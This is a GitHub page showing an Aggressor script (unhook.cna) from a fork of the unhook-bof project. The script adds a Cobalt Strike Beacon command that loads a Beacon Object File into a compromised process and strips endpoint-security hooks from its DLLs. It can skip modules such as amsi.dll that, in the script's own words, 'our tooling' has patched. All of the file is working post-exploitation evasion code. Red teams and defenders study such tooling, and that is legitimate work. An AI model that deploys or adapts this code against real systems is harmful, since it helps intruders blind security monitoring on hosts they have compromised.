forked from rsmudge/unhook-bof
-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy pathunhook.cna
executable file
·37 lines (28 loc) · 1.11 KB
/
unhook.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
alias unhook {
local('$barch $handle $data $stomp $args');
# figure out the arch of this session
$barch = barch($1);
$stomp = [data_query("metadata")["c2profile"] getString: ".stage.module_ $+ $barch"];
if(size(@_) > 1) {
while(size(@_) > 1) {
$mod = lc([pop(@_) trim]);
if ('*.dll' !iswm $mod) {
$mod .= '.dll'
}
$stomp = $stomp . "," . $mod;
}
}
# read in the right BOF file
$handle = openf(script_resource("unhook. $+ $barch $+ .o"));
$data = readb($handle, -1);
closef($handle);
# pack the arguments
$args = bof_pack($1, "z", $stomp);
btask($1, "Running unhook.\n Will skip these modules (first is stomped): " . join(', ', split(',', $stomp)));
# run it..
beacon_inline_execute($1, $data, "go", $args);
}
beacon_command_register(
"unhook",
"remove hooks from DLLs in this process",
"Synopsis: unhook [[skip-module1] [... [skip-moduleN]]]\n\nAttempt to remove hooks from all DLLs except from modules specified as optional parameters.\nExample use:\n\tbeacon> unhook amsi wldp\nwill not unhook amsi.dll and wldp.dll that might have been intentionally patched by our tooling.");